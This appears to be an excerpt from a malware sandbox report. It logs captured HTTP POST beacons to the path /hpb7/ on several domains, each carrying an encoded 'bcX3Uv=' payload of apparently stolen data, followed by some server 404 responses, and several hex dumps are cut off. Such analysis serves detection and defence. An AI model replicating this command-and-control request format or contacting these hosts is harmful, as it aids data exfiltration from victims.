6d 67 67 38 2d 53 32 4b 4e 30 65 32 35 71 41 28 6b 44 4d 32 55 67 32 6d 4e 53 49 56 4f 41 6e 57 5f 66 71 67 57 4a 54 6e 4d 32 6a 38 63 77 31 55 72 78 3
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 77 67 72 74 72 5f 31 49 32 4b 57 35 47 72 6d 6e 47 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oNwgrtr_1I2KW5GrmnGg).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 77 49 4e 32 4a 77 69 55 5a 5f 4d 46 54 65 4b 31 47 5a 62 52 28 6a 52 4d 28 2d 35 4c 66 4f 28 36 6b 6e 6b 54 41 74 76 50 6f 72 56 5f 36 37 69 63 32 4d 34 42 4c 4c 5a 51 68 57 57 74 4a 56 4a 6e 33 42 7a 53 75 52 48 54 65 65 71 70 4e 48 77 48 55 79 6d 33 68 44 46 4c 5a 64 77 53 61 62 64 4e 74 6f 58 51 51 64 6c 35 45 38 6b 47 4d 48 76 78 36 30 71 38 53 66 76 47 77 47 59 77 56 46 28 75 56 70 62 78 52 51 47 58 73 41 56 51 7e 34 76 4f 37 4a 42 6d 39 67 48 68 6a 4d 56 53 7a 61 6e 71 4c 72 6d 70 64 6e 5a 4f 78 4c 55 61 56 2d 6b 51 75 48 64 44 70 67 7e 43 6f 73 66 42 59 36 67 72 63 35 4d 5a 6d 63 4d 4c 77 77 43 6e 74 4a 75 51 7e 31 51 4e 6c 6d 61 46 78 38 6c 6e 54 72 54 72 4d 63 35 56 55 48 37 44 4e 6a 42 6b 59 31 58 5f 36 7a 62 46 6d 47 73 57 56 6a 75 62 74 7a 57 6d 6b 46 32 76 31 35 63 41 6c 76 78 70 55 57 78 75 4c 55 7a 61 4e 7a 79 45 4c 33 6b 49 74 6a 42 2d 5a 6c 43 52 47 2d 6b 77 39 6e 79 67 42 6b 71 4e 6e 63 4e 30 31 46 66 78 7e 59 70 74 4e 34 43 6e 32 58 74 66 6e 5f 28 34 36 37 67 32 50 63 6d 49 56 6b 6e 52 56 7a 4c 41 73 76 54 52 75 59 6e 72 66 76 55 57 53 45 35 30 77 63 5a 4e 39 6c 38 63 6d 5f 62 46 53 53 54 5a 71 66 70 51 36 70 6d 35 37 57 58 32 71 43 44 46 64 4c 6f 4c 4a 68 77 4b 71 66 6e 77 73 30 71 47 73 45 63 78 30 72 53 78 34 75 6f 75 74 31 58 46 28 31 52 4e 53 41 34 36 79 4c 31 58 33 64 6b 4d 7e 56 32 31 52 50 73 52 46 65 61 66 68 34 7e 6f 50 6b 4e 44 7a 5f 45 74 32 68 36 65 4e 52 39 73 6e 45 36 4a 28 35 6b 4f 59 58 6a 48 79 44 77 73 51 6b 35 32 53 2d 65 46 50 4d 30 49 61 39 67 72 46 6c 63 67 71 6e 4a 6a 51 4c 6e 4e 70 7a 64 71 50 46 56 6a 62 6a 65 36 76 7a 48 38 37 5a 39 6b 28 63 49 52 44 51 64 49 5a 34 50 4e 44 4f 65 6b 74 69 56 6f 31 36 78 66 39 65 65 35 72 76 6f 62 52 68 66 4b 69 39 59 35 39 52 76 72 30 39 41 57 4f 42 51 38 70 65 66 7a 4e 42 55 45 56 78 44 62 33 4e 52 30 52 32 58 73 7e 4b 42 4f 57 63 50 66 6f 7a 77 48 58 51 6f 72 45 32 33 79 75 78 28 38 43 4d 48 5a 65 4b 39 74 74 68 51 75 79 74 33 56 61 36 67 61 66 59 33 6f 65 61 4b 78 33 77 39 55 5a 4e 79 4e 36 35 6e 61 71 43 43 68 62 64 70 6a 37 32 54 48 64 31 75 54 78 53 6c 4b 69 56 4e 32 58 66 66 76 78 52 76 33 6a 45 77 31 6f 4c 63 5a 34 75 37 6a 46 76 32 71 4d 73 43 4b 6f 6a 33 70 48 73 73 77 74 44 6d 64 52 62 4a 6f 4f 5f 74 62 6f 75 71 43 69 5a 33 58 37 37 31 74 35 67 4b 48 63 61 28 64 48 68 4a 51 6e 7a 74 78 44 57 56 34 41 6b 4f 6c 75 4a 6f 32 7a 56 4a 67 73 54 38 36 6e 6d 33 74 65 78 7a 6b 7a 6f 52 4d 6f 6c 39 53 79 79 4c 36 6c 77 46 61 59 34 52 4f 4b 30 48 45 43 64 4c 73 62 46 70 65 37 4a 77 66 7a 53 4d 69 55 36 4e 41 4a 50 7e 4
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 52 4d 7e 6c 75 5a 74 42 55 30 74 5a 45 4d 79 6d 4b 4f 30 68 77 51 53 57 31 66 6e 63 56 41 72 65 61 2d 32 78 6e 39 28 66 37 4e 59 68 6e 47 37 45 4c 4a 6a 42 65 53 72 39 41 33 6a 4d 51 54 7a 53 5a 59 4b 4b 6f 56 73 69 32 79 57 54 4c 45 59 72 66 67 64 70 62 63 48 50 79 44 72 4c 61 43 73 30 64 6b 28 51 4a 6c 47 55 28 34 49 64 5a 37 67 30 76 66 6e 76 67 59 5a 44 33 39 51 35 43 46 6b 50 44 79 31 6f 50 57 39 37 4d 5f 38 73 34 4c 33 37 4c 53 50 43 62 67 59 38 55 71 66 5a 46 33 5a 32 67 56 30 71 61 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCbgY8UqfZF3Z2gV0qaA).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 44 5f 57 6c 6a 61 46 42 63 30 74 61 4c 73 79 6d 45 65 30 62 77 51 65 57 31 65 6a 4d 56 53 48 65 66 39 4f 78 6e 66 58 66 35 4e 59 68 76 6d 37 41 47 70 6a 74 65 53 76 78 41 79 66 63 51 57 4c 53 5a 4b 43 4b 34 46 73 68 36 79 57 57 4d 45 59 6f 43 51 64 70 62 63 4c 54 79 43 72 39 61 43 6b 30 64 33 6e 51 4a 6e 7e 58 35 6f 49 63 42 4c 67 30 76 66 62 67 67 59 5a 31 33 2d 68 2d 43 45 45 50 43 67 74 6f 44 6e 39 34 43 5f 38 76 37 4c 32 4f 49 42 57 64 5a 69 49 67 47 71 33 6c 45 7a 78 34 6b 46 59 6d 4e 75 54 47 4e 76 74 4d 43 45 44 52 35 44 47 49 52 4c 4f 52 41 33 4f 75 57 78 6b 5f 57 6d 39 58 6b 59 62 50 49 42 4d 41 45 6f 4a 30 75 54 69 49 6e 6b 37 58 36 4e 48 59 42 4c 4a 56 51 6e 32 35 6c 78 55 79 28 72 51 42 6b 44 6b 69 51 49 52 67 75 58 71 59 76 74 4c 36 6a 69 74 75 31 30 55 58 78 6d 35 46 51 47 77 47 62 61 42 59 34 58 6d 73 67 42 47 63 50 44 69 4a 35 55 52 4a 64 34 73 49 6d 78 65 4a 43 53 68 2d 7e 58 76 59 39 78 56 45 41 74 6a 54 55 73 36 31 28 5f 4b 6e 78 37 76 30 64 4b 78 75 35 57 43 42 61 6d 6b 5a 50 62 41 2d 75 65 68 71 71 54 57 59 51 77 61 67 4c 6c 73 49 63 43 64 31 52 74 77 64 72 69 47 46 4c 37 43 77 34 31 64 45 4e 31 6e 44 59 53 74 6a 44 71 37 50 6e 74 4c 78 73 4c 5a 30 39 76 4c 6f 69 69 4d 71 56 56 44 35 58 75 38 4a 43 6f 43 53 32 47 74 57 38 35 59 59 35 30 43 78 56 6d 75 6f 37 71 68 78 74 47 47 4c 4c 39 53 6d 65 65 6c 32 4d 4b 6d 34 6c 74 49 48 65 4b 55 4a 62 53 68 59 4c 66 37 41 44 45 54 4c 70 45 35 5f 77 35 51 35 28 4a 47 44 50 46 4f 45 56 49 4e 54 79 54 4f 30 52 2d 38 4a 77 69 6f 6a 42 30 71 43 55 38 36 46 4a 5f 72 62 4f 7a 6d 65 79 66 47 79 6d 69 6c 52 61 6d 6b 6a 4a 34 52 47 74 69 74 4c 63 47 6b 4f 36 38 39 43 78 48 62 54 64 42 4b 4e 65 62 4b 47 75 30 72 6b 6c 57 78 69 77 6a 4f 36 31 5f 35 38 64 42 52 2d 4f 5a 41 39 33 4e 78 4e 58 39 46 6d 6a 57 77 39 4f 51 4a 78 58 65 63 73 71 6f 59 76 4c 6f 79 49 43 4f 28 6d 30 4e 47 63 4b 38 69 44 28 39 42 76 7e 57 62 43 6f 52 6e 53 34 47 44 44 78 56 6d 6b 4c 51 59 68 4f 5f 50 32 42 68 31 4b 7a 43 72 76 4b 65 52 32 4b 33 38 38 75 32 66 6f 4b 7a 38 74 6c 78 36 4d 38 76 44 6e 66 72 48 67 4b 69 65 31 48 4e 4d 7a 70 61 66 6b 49 72 4d 58 54 4f 35 52 33 48 62 6f 32 73 59 45 45 39 32 6c 74 54 7e 37 53 4a 6b 35 45 71 58 56 61 78 7e 47 7e 66 41 64 74 37 6d 33 39 42 6a 30 6f 78 54 69 47 61 72 6b 68 57 42 7a 66 6b 7e 4d 6b 4b 4b 4c 6b 45 35 62 42 7a 75 36 39 6c 34 47 58 47 73 69 67 77 68 56 32 64 42 4c 56 39 55 5a 79 37 56 5f 41 6c 48 6e 62 67 56 58 66 5f 35 38 53 6d 45 64 36 58 42 30 7a 65 6f 63 79 78 54 67 50 69 73 72 56 4b 64 51 28 64 35 45 5
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 69 76 6b 49 41 2d 33 38 77 78 69 30 63 45 6e 79 76 46 52 4e 34 4c 4e 78 4e 31 70 6c 34 48 4c 5a 62 32 6f 33 73 6f 4f 43 4b 62 66 65 4b 59 38 35 68 6a 4f 70 5a 47 45 5a 66 4a 49 58 44 34 36 44 34 4f 47 59 4f 54 7e 52 72 45 31 6e 73 53 68 48 38 32 75 42 72 6d 58 4c 34 64 48 49 30 42 39 56 61 64 72 77 4f 54 6c 57 52 46 62 65 79 34 63 64 61 69 30 6b 54 4b 6c 44 63 54 4f 6f 42 5f 66 4b 44 67 6c 45 28 38 6f 65 37 4b 64 52 7e 73 79 71 42 78 52 65 72 47 6d 62 63 64 70 36 66 71 62 58 39 54 49 4c 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRerGmbcdp6fqbX9TILuA).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 77 66 55 49 54 4a 72 38 6e 42 69 33 43 30 6e 79 34 56 51 4b 34 4c 42 78 4e 30 64 31 37 31 6e 5a 62 68 73 33 6f 37 6d 43 49 62 66 65 4d 59 39 2d 75 44 4f 5f 5a 47 52 6f 66 4d 30 48 44 2d 4b 44 7e 63 7e 59 4b 7a 7e 57 33 55 31 6d 67 79 68 45 7a 57 75 42 72 6d 4b 6f 34 63 47 5f 30 46 78 56 61 6f 28 77 4f 52 4e 56 51 56 62 66 74 6f 63 64 61 69 34 68 54 4b 6c 54 63 54 47 34 42 37 54 4b 43 79 52 45 73 4a 55 64 72 71 64 53 7a 4d 7a 44 4e 43 38 58 68 33 75 6a 62 50 35 42 64 75 36 36 30 33 42 67 34 6a 28 41 6f 64 58 78 44 49 5a 6e 47 62 6d 4c 6b 37 32 44 7a 49 49 6d 4d 36 41 65 74 70 6e 75 79 4c 54 79 46 50 73 39 63 36 4f 47 4c 56 34 61 31 39 43 31 5a 43 72 69 6e 31 78 61 62 42 67 6a 79 45 79 47 75 44 74 75 4f 53 36 66 4e 47 51 39 65 76 4d 49 49 49 35 67 64 54 61 43 38 62 35 31 70 77 67 2d 4d 74 48 71 62 62 6b 36 6c 6c 75 63 31 32 4f 4d 34 49 31 4b 76 48 57 2d 77 4c 63 31 57 57 38 46 78 38 6e 54 51 31 68 6e 28 46 47 41 39 67 79 45 46 69 67 4e 42 5f 39 31 62 62 35 47 64 7a 66 36 70 42 46 68 59 37 6c 50 6d 33 61 64 54 50 48 69 31 64 6a 33 57 6e 48 71 36 44 76 68 66 30 58 34 76 57 64 30 76 6a 30 71 69 44 73 51 54 37 62 2d 6a 57 34 5a 7e 45 43 2d 30 56 73 45 55 6c 36 43 4a 6e 33 6c 68 70 54 6f 78 59 4b 6d 55 52 39 45 58 4e 34 4f 63 51 51 56 7a 55 7e 41 61 66 43 57 4d 68 66 62 7a 4c 6c 7a 32 47 51 43 6b 63 4f 34 4e 77 5a 42 4e 52 31 5f 75 45 4a 35 79 62 36 56 41 39 47 57 4a 54 52 4a 73 59 61 38 74 36 37 35 67 51 45 61 79 59 69 35 73 6b 31 79 5a 41 31 7a 67 54 74 71 58 74 6c 68 59 53 79 7a 57 54 36 76 53 47 64 46 56 4d 66 4b 55 4d 6a 47 65 75 47 44 6a 76 6f 37 54 35 78 6a 57 6b 62 59 44 75 52 75 50 31 39 43 67 62 4c 48 45 52 31 44 75 69 28 7a 28 44 48 6f 77 4b 6e 35 28 46 30 59 64 6b 34 56 31 68 5a 52 6b 69 56 52 4b 45 4b 30 49 75 71 5a 48 53 62 68 4e 38 4b 41 45 59 6e 55 62 44 6a 41 4f 38 4d 67 32 58 5a 35 6a 77 61 57 52 38 4f 64 58 65 57 4e 48 55 36 71 7e 4f 76 6c 50 55 51 42 43 77 78 34 4c 4a 6a 4c 4b 31 48 43 6f 35 42 52 42 78 76 77 50 47 77 70 4a 65 43 49 71 45 33 74 71 4a 4b 62 44 44 43 6e 57 49 66 45 42 38 58 35 48 70 65 63 67 72 4c 75 4c 30 54 4f 37 4a 44 43 32 6d 31 69 51 4d 6a 7a 4a 73 45 77 71 4c 46 70 68 74 5a 41 59 2d 53 6d 52 2d 7a 54 58 32 6c 70 45 5a 68 58 45 43 69 4a 4b 45 44 57 62 4d 5a 33 41 50 4c 41 7e 61 33 74 37 70 5a 44 6e 69 51 4a 66 46 57 33 6a 57 59 33 45 77 31 34 75 70 45 51 66 32 4d 5a 71 71 73 2d 47 36 57 43 6e 32 65 6a 36 37 37 2d 55 70 50 63 49 74 63 79 62 32 38 47 5a 63 70 44 4d 6b 69 35 56 53 36 34 70 5f 32 47 44 69 4a 39 79 66 70 74 63 6c 7e 6e 7a 44 55 6a 73 6b 44 4
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 28 6d 4b 38 51 6b 52 4c 77 5f 6d 75 78 44 30 48 70 49 69 73 48 30 72 70 72 66 41 54 6b 6d 6c 6e 42 4b 68 67 79 37 65 6e 75 78 58 59 79 35 45 30 45 70 7e 58 51 6d 72 72 5a 4d 55 6e 75 76 37 33 51 69 6b 57 37 36 4c 46 59 74 71 34 32 6e 59 43 63 70 69 6c 54 39 6d 62 4e 32 54 39 4e 65 66 32 7a 68 6d 72 36 7a 4d 33 68 53 34 62 58 4c 76 6b 71 39 6d 6a 6a 67 54 33 70 45 47 69 44 34 6b 2d 51 2d 53 77 76 78 73 78 28 71 63 36 6d 42 42 61 36 51 6a 46 62 4d 68 54 47 69 4b 4e 51 5a 47 2d 5a 50 31 53 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFbMhTGiKNQZG-ZP1S9g).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 77 6d 61 38 57 44 39 4c 6e 50 6d 74 39 6a 30 48 67 6f 69 67 48 30 6e 70 72 62 59 44 6b 55 70 6e 50 38 78 67 79 5a 6d 6e 7e 42 58 59 6a 70 45 77 4b 4a 28 55 51 6d 28 5a 5a 4a 70 53 75 74 58 33 52 77 73 57 35 61 4c 45 48 64 71 35 78 6e 59 46 53 4a 69 6c 54 39 72 36 4e 79 47 41 4e 66 33 32 79 54 75 72 36 32 34 30 68 43 34 61 50 37 76 6b 71 39 71 77 6a 67 54 42 70 45 50 6e 44 34 45 2d 52 73 4b 77 74 67 73 79 70 4b 63 39 6c 42 41 51 38 41 4b 62 50 63 6f 6b 54 69 4b 7a 65 65 37 76 50 72 67 49 6f 36 75 44 56 74 4a 58 76 71 73 47 48 6a 45 5a 72 57 76 58 38 74 74 79 31 7a 34 4a 31 6d 4d 31 57 59 42 50 5a 38 69 6f 45 62 35 45 58 4f 4f 6c 6e 38 7e 4b 6a 6c 4c 4f 78 37 39 30 53 69 35 30 70 78 4e 37 43 6a 33 43 49 6c 39 31 34 69 56 6b 4d 45 4d 69 62 4e 28 54 30 35 52 63 30 55 49 58 46 57 34 46 56 33 41 48 61 45 66 56 47 4a 66 53 37 32 73 6f 42 6f 68 50 72 53 56 33 48 73 56 34 7a 58 49 36 79 54 56 46 49 5f 49 4e 4b 6e 48 4c 31 33 75 4f 61 37 30 49 41 38 74 4e 4c 6f 77 36 4c 71 6b 49 31 35 6f 5f 73 32 55 4f 28 5a 41 74 46 34 52 45 54 44 42 76 28 31 52 30 75 6f 7e 4c 7e 4a 47 6f 7e 73 48 7a 76 42 44 71 75 6d 78 61 54 76 54 6d 30 4d 6c 33 57 54 4e 4f 71 79 42 5f 47 32 73 68 6a 66 4b 48 78 73 76 71 30 6b 51 75 45 6c 7a 78 43 37 43 6d 4e 55 46 73 6f 72 54 2d 58 51 4c 64 67 32 73 37 49 33 6a 50 62 79 54 5f 50 66 58 65 71 44 72 49 67 4e 37 37 78 33 28 61 6e 70 38 69 30 67 49 71 68 49 6f 39 49 49 39 4a 4a 68 63 35 28 56 28 62 33 6f 65 65 76 41 4e 65 66 70 32 62 67 62 6a 6f 34 31 67 6a 44 53 6f 71 30 59 50 4b 31 6f 75 46 6e 57 4c 49 42 52 48 61 69 31 46 61 4b 66 4a 46 6f 63 6c 6e 67 6b 45 43 34 59 66 32 65 33 69 75 75 5f 47 2d 4f 55 57 62 55 55 71 56 30 61 63 34 6e 31 41 4d 43 64 35 6c 53 70 6f 33 41 49 76 65 76 33 39 73 4c 45 4f 71 28 5f 32 71 69 42 53 69 56 30 63 6a 36 34 4a 6f 79 43 64 57 67 71 76 5a 49 6e 76 52 73 36 4f 2d 76 77 47 57 7a 5a 72 6b 66 61 39 48 5a 64 35 79 75 6c 4f 6f 48 4e 43 50 79 72 77 56 78 43 4d 72 79 46 6a 41 63 4b 51 50 7e 47 54 36 48 56 62 76 65 7a 4a 30 6d 66 57 42 4a 4b 43 4d 56 4d 59 52 6a 62 37 77 34 72 51 68 68 5f 52 56 28 6a 34 34 58 41 76 72 6e 43 50 6d 59 53 59 61 66 31 30 52 77 70 52 6a 33 68 28 46 47 57 45 53 75 63 33 65 6c 51 54 38 79 61 35 6c 7a 77 48 48 6c 69 6e 42 66 54 6d 56 46 74 79 61 43 58 7e 35 37 4e 55 53 7e 47 4d 4c 34 77 43 74 4f 4d 42 6c 77 48 51 7a 71 38 7e 77 46 36 58 55 55 76 68 57 57 5f 62 65 32 62 7a 64 75 66 28 48 50 56 63 6b 72 36 67 6c 4c 46 76 68 79 6f 61 4b 51 73 34 4c 4b 53 37 31 58 33 68 48 56 33 61 79 39 59 35 38 67 73 53 30 78 64 72 6f 58 4b 4b 41 3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-IIS/8.5Date: Tue, 21 Mar 2023 07:07:25 GMTConnection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:07:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 6b 00 0c 1f 24 f1 21 92 92 91 84 48 89 12 48 98 81 14 65 30 98 c9 4c 3f 85 4d 88 c0 27 fd 05 c5 fb 78 44 78 bc ce c9 ba 33 80 71 7b a7 bb f2 84 87 87 87 87 47 84 bb 87 87 c7 ef fc b5 65 b9 a8 1e f6 45 76 57 6d 37 6f 7f 87 fe 3b db e4 bb db 2f 5e 7c 9d bf 20 bf 8b 7c f9 f6 77 b6 45 95 67 8b bb fc 70 2c aa 2f 5e 9c aa 55 77 f6 42 7c dd e5 db e2 8b 17 1f d6 c5 fd be 3c 54 2f b2 45 b9 ab 8a 1d 81 ba 5f 2f ab bb 2f 96 c5 87 f5 a2 e8 b2 1f 9d 6c bd 5b 57 eb 7c d3 3d 2e f2 4d f1 c5 a0 d7 ef 64 b2 66 77 b5 ae be 58 94 1f 8a 83 8e f9 50 ac 8a c3 81 7c ad 31 ef ca ae fc da bd bf 2b 76 dd 65 79 bf bb 3d e4 cb 42 af ba 2a 0f db bc ea 2e 8b aa 58 54 eb 72 07 50 54 c5 a6 d8 df 95 bb e2 8b 5d 49 2a 1d 17 87 f5 be ca f2 e3 c3 6e 91 1d 0f 8b 2f 5e dc 55 d5 fe 78 fd e6 cd fd fd 7d ef b6 2c 6f 37 04 ed ed 36 df e5 b7 c5 a1 b7 28 b7 6f 6e c9 ef 37 5f 1f ff ed f5 f2 8b 3f fb 6e 77 38 99 8d 66 57 97 e3 51 77 40 d0 bd e1 f8 24 de b7 ff 56 96 dd af 77 84 ca de 32 af f2 3f ca 1f 8a 43 f6 85 fd e9 df fd 77 b3 9f 7f 75 43 80 57 a7 1d 23 38 a3 8d bc be 78 54 20 bd fd e9 78 f7 3a 3f dc 9e b6 a4 1b c7 8b 9b 27 02 cd 80 3e fb fa f8 59 27 db 15 f7 d9 ef e7 55 f1 fa e2 e2 e6 df 52 45 a4 d7 ab f5 2d 29 fe 4c a7 f4 33 02 64 d2 da 94 07 7f d0 1d fd c5 97 3f fd f2 c7 7f fe e3 3f 1e fd 36 73 00 d2 a9 f7 1f 08 0e ef 6c f7 b8 ae 8a 2e 11 c8 f5 6a bd c8 0d 01 fa f3 9f 9d fe 68 f5 e3 5d ff 63 fe f5 f6 27 df fc f8 f7 27 7f f6 70 f9 fd ef 7f e8 7f bd fb a3 cb 6f de f7 7f 5a fe e0 47 c7 1f 5c 5d ee be 5c 1d 5f bc 79 fb 3b 9b f5 ee 7d 76 28 36 5f bc d8 1f 0a 82 64 47 24 32 5b ee 8e dd 3d 95 e4 6a 71 f7 22 bb 23 7f 7d f1 c2 cd ed 17 0d b1 74 09 8a cd 43 b5 5e 1c d3 b1 e4 5f e7 1f 05 9a 7c bf 6e 80 60 b1 dc 7d 4d aa 6d ca d3 72 b5 c9 0f 45 3a 86 3d e9 7f be 1c 0a 2a 88 70 2e c5 60 a4 a3 12 1d 59 1e 7b b7 bd 65 79 9a 6f 8a c5 66 bd 78 df db 15 55 1a a2 6a bf 38 07 3d f9 b2 1d 19 6c 8c 8f 15 69 7d d1 60 64 8e 85 e8 43 7a dd 15 99 05 c7 e6 4d 8b ea 6d c4 6a 7b ec fd e2 94 13 34 c5 e1 43 83 0e 1c 8b c5 89 08 23 d9 33 3e 90 85 a5 c1 f4 22 72 dd 83 63 5f dd af b7 b7 cd d0 7c 7d 5c 16 9b f5 87 43 fa f8 af b7 64 6e 1c bb ab a2 77 3c 6e ba e2 57 be cd bf 69 22 8c a4 c2 9e 2c 39 b4 33 4d 51 6c 7b db 62 b9 ce 1b 93 b0 ee 6d cb e3 dd 7a 5b 36 98 4a db 4d ef 43 be 39 11 b0 ed b6 38 2c 1a c8 c4 32 df 2c ce 80 63 1e c6 b1 29 f3 e5 0b b2 d1 52 0d 65 47 54 26 aa 7e f1 bf df dc 97 ab 95
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 21 Mar 2023 07:07:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://kunimi.org/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingContent-Encoding: gzipData Raw: 64 64 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 6b 93 6c 49 92 18 86 7d e7 af 38 b8 57 57 7d ab 27 33 6f be 2b ab 6a fb 72 67 67 a7 77 07 b3 f3 d8 9d dd 25 16 83 b6 6b 27 33 4f 56 65 df cc 3c 39 99 27 6f dd ea 62 c1 76 66 00 89 